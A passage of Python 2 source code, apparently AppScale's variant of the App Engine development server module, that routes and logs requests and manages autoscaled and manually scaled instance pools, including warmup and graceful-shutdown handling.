file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
external_api_port: An integer specifying the location of an external API
server.
"""
self._module_configuration = module_configuration
self._name = module_configuration.module_name
self._host = host
self._api_port = api_port
self._external_api_port = external_api_port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._balanced_port = balanced_port
self._php_executable_path = php_executable_path
self._enable_php_remote_debugging = enable_php_remote_debugging
self._python_config = python_config
self._cloud_sql_config = cloud_sql_config
self._request_data = request_data
# _create_instance_factory() transitively calls _get_runtime_config, which
# uses self._allow_skipped_files.
self._allow_skipped_files = allow_skipped_files
self._instance_factory = self._create_instance_factory(
self._module_configuration)
self._dispatcher = dispatcher
self._max_instances = max_instances
self._automatic_restarts = automatic_restarts
self._use_mtime_file_watcher = use_mtime_file_watcher
if self._automatic_restarts:
self._watcher = file_watcher.get_file_watcher(
[self._module_configuration.application_root] +
self._instance_factory.get_restart_directories(),
self._use_mtime_file_watcher)
else:
self._watcher = None
self._handler_lock = threading.Lock()
self._handlers = self._create_url_handlers()
self._default_version_port = default_version_port
self._port_registry = port_registry
self._balanced_module = wsgi_server.WsgiServer(
(self._host, self._balanced_port), self)
self._quit_event = threading.Event() # Set when quit() has been called.
# AppScale: Keeps track of active requests in case of shutdown.
# Indicates that the instance should refuse future requests.
self.sigterm_sent = False
# Handles request count and sigterm flag mutations.
self.graceful_shutdown_lock = threading.Lock()
# Keeps track of how many requests the instance is serving.
self.request_count = 0
# End AppScale.
@property
def name(self):
"""The name of the module, as defined in app.yaml.
This value will be constant for the lifetime of the module even in the
module configuration changes.
"""
return self._name
@property
def ready(self):
"""The module is ready to handle HTTP requests."""
return self._balanced_module.ready
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on."""
assert self._balanced_module.ready, 'balanced module not running'
return self._balanced_module.port
@property
def host(self):
"""The host that the HTTP server(s) for this Module is listening on."""
return self._host
@property
def balanced_address(self):
"""The address of the balanced HTTP server e.g. "localhost:8080"."""
if self.balanced_port != 80:
return '%s:%s' % (self.host, self.balanced_port)
else:
return self.host
@property
def max_instance_concurrent_requests(self):
"""The number of concurrent requests that each Instance can handle."""
return self._instance_factory.max_concurrent_requests
@property
def module_configuration(self):
"""The application_configuration.ModuleConfiguration for this module."""
return self._module_configuration
@property
def supports_interactive_commands(self):
"""True if the module can evaluate arbitrary code and return the result."""
return self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
inst=None):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
raise NotImplementedError()
def _no_handler_for_request(self, environ, start_response, request_id):
"""Handle a HTTP request that does not match any user-defined handlers."""
self._insert_log_message('No handlers matched this URL.', 2, request_id)
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['The url "%s" does not match any handlers.' % environ['PATH_INFO']]
def _error_response(self, environ, start_response, status):
start_response('%d %s' % (status, httplib.responses[status]), [])
return []
# AppScale: Check if the instance should be shutting down before handling
# request.
def _handle_request(self, environ, start_response, **kwargs):
""" A _handle_request wrapper that keeps track of active requests.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
with self.graceful_shutdown_lock:
if self.sigterm_sent:
start_response('503 Service Unavailable',
[('Content-Type', 'text/plain')])
return ['This instance is shutting down']
self.request_count += 1
try:
return self._handle_request_impl(environ, start_response, **kwargs)
finally:
with self.graceful_shutdown_lock:
self.request_count -= 1
# End AppScale.
def _handle_request_impl(self, environ, start_response, inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen. Setting inst is not meaningful if the
request does not match a "script" handler.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
try:
environ['SERVER_PORT'] = environ['HTTP_HOST'].split(':')[1]
except IndexError:
scheme = environ['HTTP_X_FORWARDED_PROTO']
if scheme == 'http':
environ['SERVER_PORT'] = 80
else:
environ['SERVER_PORT'] = 443
if 'HTTP_HOST' in environ:
environ['SERVER_NAME'] = environ['HTTP_HOST'].split(':', 1)[0]
environ['DEFAULT_VERSION_HOSTNAME'] = '%s:%s' % (
environ['SERVER_NAME'], environ['SERVER_PORT'])
with self._request_data.request(
environ,
self._module_configuration) as request_id:
should_log_request = not _REQUEST_LOGGING_BLACKLIST_RE.match(
environ['PATH_INFO'])
environ['REQUEST_ID_HASH'] = self.generate_request_id_hash()
if should_log_request:
environ['REQUEST_LOG_ID'] = self.generate_request_log_id()
if 'HTTP_HOST' in environ:
hostname = environ['HTTP_HOST']
elif environ['SERVER_PORT'] == '80':
hostname = environ['SERVER_NAME']
else:
hostname = '%s:%s' % (environ['SERVER_NAME'], environ['SERVER_PORT'])
if environ.get('QUERY_STRING'):
resource = '%s?%s' % (urllib.quote(environ['PATH_INFO']),
environ['QUERY_STRING'])
else:
resource = urllib.quote(environ['PATH_INFO'])
email, _, _ = login.get_user_info(environ.get('HTTP_COOKIE', ''))
method = environ.get('REQUEST_METHOD', 'GET')
http_version = environ.get('SERVER_PROTOCOL', 'HTTP/1.0')
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice.start_request(
request_id=request_id,
user_request_id=environ['REQUEST_LOG_ID'],
ip=environ.get('REMOTE_ADDR', ''),
app_id=self._module_configuration.application,
version_id=self._module_configuration.version_id,
nickname=email.split('@', 1)[0],
user_agent=environ.get('HTTP_USER_AGENT', ''),
host=hostname,
method=method,
resource=resource,
http_version=http_version)
def wrapped_start_response(status, response_headers, exc_info=None):
response_headers.append(('Server',
http_runtime_constants.SERVER_SOFTWARE))
if should_log_request:
headers = wsgiref.headers.Headers(response_headers)
status_code = int(status.split(' ', 1)[0])
content_length = int(headers.get('Content-Length', 0))
logservice.end_request(request_id, status_code, content_length)
logging.info('%(module_name)s: '
'"%(method)s %(resource)s %(http_version)s" '
'%(status)d %(content_length)s',
{'module_name': self.name,
'method': method,
'resource': resource,
'http_version': http_version,
'status': status_code,
'content_length': content_length or '-'})
return start_response(status, response_headers, exc_info)
if (environ['REQUEST_METHOD'] in ('GET', 'HEAD', 'TRACE') and
int(environ.get('CONTENT_LENGTH') or '0') != 0):
# CONTENT_LENGTH may be empty or absent.
wrapped_start_response('400 Bad Request', [])
return ['"%s" requests may not contain bodies.' %
environ['REQUEST_METHOD']]
with self._handler_lock:
handlers = self._handlers
try:
request_url = environ['PATH_INFO']
if request_type in (instance.BACKGROUND_REQUEST,
instance.INTERACTIVE_REQUEST,
instance.SHUTDOWN_REQUEST):
app = functools.partial(self._handle_script_request,
url_map=_DUMMY_URLMAP,
match=_EMPTY_MATCH,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
for handler in handlers:
match = handler.match(request_url)
if match:
auth_failure = handler.handle_authorization(environ,
wrapped_start_response)
if auth_failure is not None:
return auth_failure
if isinstance(handler, _ScriptHandler):
app = functools.partial(self._handle_script_request,
url_map=handler.url_map,
match=match,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
else:
return handler.handle(match, environ, wrapped_start_response)
return self._no_handler_for_request(environ, wrapped_start_response,
request_id)
except StandardError, e:
logging.exception('Request to %r failed', request_url)
wrapped_start_response('500 Internal Server Error', [], e)
return []
def _async_shutdown_instance(self, inst, port):
_THREAD_POOL.submit(self._shutdown_instance, inst, port)
def _shutdown_instance(self, inst, port):
force_shutdown_time = time.time() + _SHUTDOWN_TIMEOUT
try:
environ = self.build_request_environ(
'GET', '/_ah/stop', [], '', '0.1.0.3', port, fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.SHUTDOWN_REQUEST)
logging.debug('Sent shutdown request: %s', inst)
except:
logging.exception('Internal error while handling shutdown request.')
finally:
time_to_wait = force_shutdown_time - time.time()
self._quit_event.wait(time_to_wait)
inst.quit(force=True)
def _insert_log_message(self, message, level, request_id):
logs_group = log_service_pb.UserAppLogGroup()
log_line = logs_group.add_log_line()
log_line.set_timestamp_usec(int(time.time() * 1e6))
log_line.set_level(level)
log_line.set_message(message)
request = log_service_pb.FlushRequest()
request.set_logs(logs_group.Encode())
response = api_base_pb.VoidProto()
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice._Dynamic_Flush(request, response, request_id)
@staticmethod
def generate_request_log_id():
"""Generate a random REQUEST_LOG_ID.
Returns:
A string suitable for use as a REQUEST_LOG_ID. The returned string is
variable length to emulate the the production values, which encapsulate
the application id, version and some log state.
"""
return ''.join(random.choice(_LOWER_HEX_DIGITS)
for _ in range(random.randrange(30, 100)))
@staticmethod
def generate_request_id_hash():
"""Generate a random REQUEST_ID_HASH."""
return ''.join(random.choice(_UPPER_HEX_DIGITS)
for _ in range(_REQUEST_ID_HASH_LENGTH))
def set_num_instances(self, instances):
"""Sets the number of instances for this module to run.
Args:
instances: An int containing the number of instances to run.
"""
raise request_info.NotSupportedWithAutoScalingError()
def get_num_instances(self):
"""Returns the number of instances for this module to run."""
raise request_info.NotSupportedWithAutoScalingError()
def suspend(self):
"""Stops the module from serving requests."""
raise request_info.NotSupportedWithAutoScalingError()
def resume(self):
"""Restarts the module."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance_address(self, instance_id):
"""Returns the address of the HTTP server for an instance."""
return '%s:%s' % (self.host, self.get_instance_port(instance_id))
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
raise request_info.NotSupportedWithAutoScalingError()
@property
def supports_individually_addressable_instances(self):
return False
def create_interactive_command_module(self):
"""Returns a InteractiveCommandModule that can be sent user commands."""
if self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS:
return InteractiveCommandModule(self._module_configuration,
self._host,
self._balanced_port,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_executable_path,
self._enable_php_remote_debugging,
self._python_config,
self._cloud_sql_config,
self._default_version_port,
self._port_registry,
self._request_data,
self._dispatcher,
self._use_mtime_file_watcher,
self._allow_skipped_files)
else:
raise NotImplementedError('runtime does not support interactive commands')
def build_request_environ(self, method, relative_url, headers, body,
source_ip, port, fake_login=False):
if isinstance(body, unicode):
body = body.encode('ascii')
url = urlparse.urlsplit(relative_url)
if port != 80:
host = '%s:%s' % (self.host, port)
else:
host = self.host
environ = {constants.FAKE_IS_ADMIN_HEADER: '1',
'CONTENT_LENGTH': str(len(body)),
'PATH_INFO': url.path,
'QUERY_STRING': url.query,
'REQUEST_METHOD': method,
'REMOTE_ADDR': source_ip,
'SERVER_NAME': self.host,
'SERVER_PORT': str(port),
'SERVER_PROTOCOL': 'HTTP/1.1',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.errors': cStringIO.StringIO(),
'wsgi.multithread': True,
'wsgi.multiprocess': True,
'wsgi.input': cStringIO.StringIO(body)}
if fake_login:
environ[constants.FAKE_LOGGED_IN_HEADER] = '1'
util.put_headers_in_environ(headers, environ)
environ['HTTP_HOST'] = host
return environ
class AutoScalingModule(Module):
"""A pool of instances that is autoscaled based on traffic."""
# The minimum number of seconds to wait, after quitting an idle instance,
# before quitting another idle instance.
_MIN_SECONDS_BETWEEN_QUITS = 60
# The time horizon to use when calculating the number of instances required
# to serve the current level of traffic.
_REQUIRED_INSTANCE_WINDOW_SECONDS = 60
_DEFAULT_AUTOMATIC_SCALING = appinfo.AutomaticScaling(
min_pending_latency='0.1s',
max_pending_latency='0.5s',
min_idle_instances=1,
max_idle_instances=1000)
@staticmethod
def _parse_pending_latency(timing):
"""Parse a pending latency string into a float of the value in seconds.
Args:
timing: A str of the form 1.0s or 1000ms.
Returns:
A float representation of the value in seconds.
"""
if timing.endswith('ms'):
return float(timing[:-2]) / 1000
else:
return float(timing[:-1])
@classmethod
def _populate_default_automatic_scaling(cls, automatic_scaling):
for attribute in automatic_scaling.ATTRIBUTES:
if getattr(automatic_scaling, attribute) in ('automatic', None):
setattr(automatic_scaling, attribute,
getattr(cls._DEFAULT_AUTOMATIC_SCALING, attribute))
def _process_automatic_scaling(self, automatic_scaling):
if automatic_scaling:
self._populate_default_automatic_scaling(automatic_scaling)
else:
automatic_scaling = self._DEFAULT_AUTOMATIC_SCALING
self._min_pending_latency = self._parse_pending_latency(
automatic_scaling.min_pending_latency)
self._max_pending_latency = self._parse_pending_latency(
automatic_scaling.max_pending_latency)
self._min_idle_instances = int(automatic_scaling.min_idle_instances)
self._max_idle_instances = int(automatic_scaling.max_idle_instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
external_api_port=None):
"""Initializer for AutoScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
external_api_port: An integer specifying the location of an external API
server.
"""
super(AutoScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
external_api_port)
self._process_automatic_scaling(
self._module_configuration.automatic_scaling)
self._instances = set() # Protected by self._condition.
# A deque containg (time, num_outstanding_instance_requests) 2-tuples.
# This is used to track the maximum number of outstanding requests in a time
# period. Protected by self._condition.
self._outstanding_request_history = collections.deque()
self._num_outstanding_instance_requests = 0 # Protected by self._condition.
# The time when the last instance was quit in seconds since the epoch.
self._last_instance_quit_time = 0 # Protected by self._condition.
self._condition = threading.Condition() # Protects instance state.
self._instance_adjustment_thread = threading.Thread(
target=self._loop_adjusting_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._instance_adjustment_thread.start()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._instance_adjustment_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
with self._condition:
instances = self._instances
self._instances = set()
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
@property
def num_outstanding_instance_requests(self):
"""The number of requests that instances are currently handling."""
with self._condition:
return self._num_outstanding_instance_requests
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if request_type != instance.READY_REQUEST:
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
logging.debug('Dispatching request to %s', inst)
return inst.handle(environ, start_response, url_map, match, request_id,
request_type)
finally:
with self._condition:
if request_type != instance.READY_REQUEST:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
start_time = time.time()
timeout_time = start_time + self._min_pending_latency
# Loop until an instance is available to handle the request.
while True:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if not inst:
inst = self._add_instance(permit_warmup=False)
if not inst:
# No instance is available nor can a new one be created, so loop
# waiting for one to be free.
timeout_time = time.time() + 0.2
continue
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ,
start_response,
url_map,
match,
request_id,
request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _add_instance(self, permit_warmup):
"""Creates and adds a new instance.Instance to the Module.
Args:
permit_warmup: If True then the new instance.Instance will be sent a new
warmup request if it is configured to receive them.
Returns:
The newly created instance.Instance. Returns None if no new instance
could be created because the maximum number of instances have already
been created.
"""
if self._max_instances is not None:
with self._condition:
if len(self._instances) >= self._max_instances:
return None
perform_warmup = permit_warmup and (
'warmup' in (self._module_configuration.inbound_services or []))
inst = self._instance_factory.new_instance(
self.generate_instance_id(),
expect_ready_request=perform_warmup)
with self._condition:
if self._quit_event.is_set():
return None
self._instances.add(inst)
if not inst.start():
return None
if perform_warmup:
self._async_warmup(inst)
else:
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
logging.debug('Created instance: %s', inst)
return inst
@staticmethod
def generate_instance_id():
return ''.join(random.choice(_LOWER_HEX_DIGITS) for _ in range(36))
def _warmup(self, inst):
"""Send a warmup request to the given instance."""
try:
environ = self.build_request_environ(
'GET', '/_ah/warmup', [], '', '0.1.0.3', self.balanced_port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling warmup request.')
def _async_warmup(self, inst):
"""Asynchronously send a markup request to the given Instance."""
_THREAD_POOL.submit(self._warmup, inst)
def _trim_outstanding_request_history(self):
"""Removes obsolete entries from _outstanding_request_history."""
window_start = time.time() - self._REQUIRED_INSTANCE_WINDOW_SECONDS
with self._condition:
while self._outstanding_request_history:
t, _ = self._outstanding_request_history[0]
if t < window_start:
self._outstanding_request_history.popleft()
else:
break
def _get_num_required_instances(self):
"""Returns the number of Instances required to handle the request load."""
with self._condition:
self._trim_outstanding_request_history()
if not self._outstanding_request_history:
return 0
else:
peak_concurrent_requests = max(
current_requests
for (t, current_requests)
in self._outstanding_request_history)
return int(math.ceil(peak_concurrent_requests /
self.max_instance_concurrent_requests))
def _split_instances(self):
"""Returns a 2-tuple representing the required and extra Instances.
Returns:
A 2-tuple of (required_instances, not_required_instances):
required_instances: The set of the instance.Instances, in a state that
can handle requests, required to handle the current
request load.
not_required_instances: The set of the Instances contained in this
Module that not are not required.
"""
with self._condition:
num_required_instances = self._get_num_required_instances()
available = [inst for inst in self._instances
if inst.can_accept_requests]
available.sort(key=lambda inst: -inst.num_outstanding_requests)
required = set(available[:num_required_instances])
return required, self._instances - required
def _choose_instance(self, timeout_time):
"""Returns the best Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
required_instances, not_required_instances = self._split_instances()
if required_instances:
# Pick the instance with the most remaining capacity to handle
# requests.
required_instances = sorted(
required_instances,
key=lambda inst: inst.remaining_request_capacity)
if required_instances[-1].remaining_request_capacity:
return required_instances[-1]
available_instances = [inst for inst in not_required_instances
if inst.remaining_request_capacity > 0 and
inst.can_accept_requests]
if available_instances:
# Pick the instance with the *least* capacity to handle requests
# to avoid using unnecessary idle instances.
available_instances.sort(
key=lambda instance: instance.num_outstanding_requests)
return available_instances[-1]
else:
self._condition.wait(timeout_time - time.time())
return None
def _adjust_instances(self):
"""Creates new Instances or deletes idle Instances based on current load."""
now = time.time()
with self._condition:
_, not_required_instances = self._split_instances()
if len(not_required_instances) < self._min_idle_instances:
self._add_instance(permit_warmup=True)
elif (len(not_required_instances) > self._max_idle_instances and
now >
(self._last_instance_quit_time + self._MIN_SECONDS_BETWEEN_QUITS)):
for inst in not_required_instances:
if not inst.num_outstanding_requests:
try:
inst.quit()
except instance.CannotQuitServingInstance:
pass
else:
self._last_instance_quit_time = now
logging.debug('Quit instance: %s', inst)
with self._condition:
self._instances.discard(inst)
break
def _loop_adjusting_instances(self):
"""Loops until the Module exits, reloading, adding or removing Instances."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._adjust_instances()
self._quit_event.wait(timeout=1)
def __call__(self, environ, start_response):
return self._handle_request(environ, start_response)
class ManualScalingModule(Module):
"""A pool of instances that is manually-scaled."""
_DEFAULT_MANUAL_SCALING = appinfo.ManualScaling(instances='1')
_MAX_REQUEST_WAIT_TIME = 10
@classmethod
def _populate_default_manual_scaling(cls, manual_scaling):
for attribute in manual_scaling.ATTRIBUTES:
if getattr(manual_scaling, attribute) in ('manual', None):
setattr(manual_scaling, attribute,
getattr(cls._DEFAULT_MANUAL_SCALING, attribute))
def _process_manual_scaling(self, manual_scaling):
if manual_scaling:
self._populate_default_manual_scaling(manual_scaling)
else:
manual_scaling = self._DEFAULT_MANUAL_SCALING
self._initial_num_instances = int(manual_scaling.instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
external_api_port=None):
"""Initializer for ManualScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
external_api_port: An integer specifying the location of an external API
server.
"""
super(ManualScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
external_api_port)
self._process_manual_scaling(module_configuration.manual_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# Whether the module has been stopped. Protected by self._condition.
self._suspended = False
self._condition = threading.Condition() # Protects instance state.
# Serializes operations that modify the serving state of or number of
# instances.
self._instances_change_lock = threading.RLock()
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
with self._instances_change_lock:
if self._max_instances is not None:
initial_num_instances = min(self._max_instances,
self._initial_num_instances)
else:
initial_num_instances = self._initial_num_instances
for _ in xrange(initial_num_instances):
self._add_instance()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
inst.wait(timeout_time)
if inst.has_quit:
return self._error_response(environ, start_response, 503)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _add_instance(self):
